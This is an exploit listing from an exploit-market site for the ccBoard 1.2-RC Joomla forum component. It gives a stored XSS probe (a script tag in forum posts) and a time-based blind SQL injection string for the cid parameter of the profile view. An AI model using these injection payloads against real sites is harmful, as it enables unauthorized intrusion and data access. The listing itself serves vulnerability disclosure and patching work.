[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Joomla Component ccBoard 1.2-RC Multiple Vulnerabilities

Author
jdc
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-14825
Category
web applications
Date add
14-11-2010
Platform
php
========================================================
Joomla Component ccBoard 1.2-RC Multiple Vulnerabilities
========================================================

# Exploit Title: Joomla Component com_ccboard Multiple Vulnerabilities
# Date: 13 Nov 2010
# Author: jdc
# Category: webapps/0day
# Version: 1.2-RC
# Download: http://codeclassic.org/the-downloads/joomla-extensionscomponents/292-ccboard-bulletin-board-forum.html
 
 
Persistent XSS
--------------
ccBoard doesn't filter its posts for HTML... at all:
<script>prompt(1)</script>
 
 
Blind SQL Injection
-------------------
NOTE: must be logged in
?option=com_ccboard
&view=myprofile
&cid=63 and benchmark(5000000,md5(1))



#  0day.today [2024-12-23]  #